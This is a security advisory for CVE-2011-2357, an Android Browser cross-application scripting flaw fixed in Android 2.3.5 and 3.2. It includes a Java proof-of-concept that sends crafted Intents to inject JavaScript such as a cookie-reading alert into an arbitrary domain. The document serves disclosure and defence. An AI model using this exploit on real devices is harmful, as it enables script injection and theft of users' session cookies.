ALEPH-2011000.md

layout	credit	timeline	alephid	cve	date	title	severity	product	mitigation	references
vuln	roeeh yair	type date add 2017-03-01 type date release 2011-07-31	ALEPH-2011000	CVE-2011-2357	2011-07-31	Android Browser Cross-Application Scripting	high	Android 2.3.4 and below	Install Android 2.3.5 or 3.2.	src url Paper http://blog.watchfire.com/files/advisory-android-browser.pdf src url AOSP Commit #1 http://android.git.kernel.org/?p=platform/packages/apps/Browser.git;a=commit;h=afa4ab1e4c1d645e34bd408ce04cadfd2e5dae1e src url AOSP Commit #2 http://android.git.kernel.org/?p=platform/packages/apps/Browser.git;a=commit;h=096bae248453abe83cbb2e5a2c744bd62cdb620b

By generating a malicious Intent that targets Android's Browser, Malware may epxloit the Android's Browser URL loading process in order to inject JavaScript code into an arbitrary domain, thus breaking Android's sandboxing.

Proof-of-Concept

public class CasExploit extends Activity
{
    static final String mPackage = "com.android.browser";
    static final String mClass = "BrowserActivity";
    static final String mUrl = "http://target.domain/";
    static final String mJavascript = "alert(document.cookie)";
    static final int mSleep = 15000;

    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main);
        startBrowserActivity(mUrl);
        
        try {
            Thread.sleep(mSleep);
        }
        
        catch (InterruptedException e) {}
        startBrowserActivity("javascript:" + mJavascript);
    }
    private void startBrowserActivity(String url) {
        Intent res = new Intent("android.intent.action.VIEW");
        res.setComponent(new ComponentName(mPackage,mPackage+"."+mClass));
        res.setData(Uri.parse(url));
        startActivity(res);
    }
}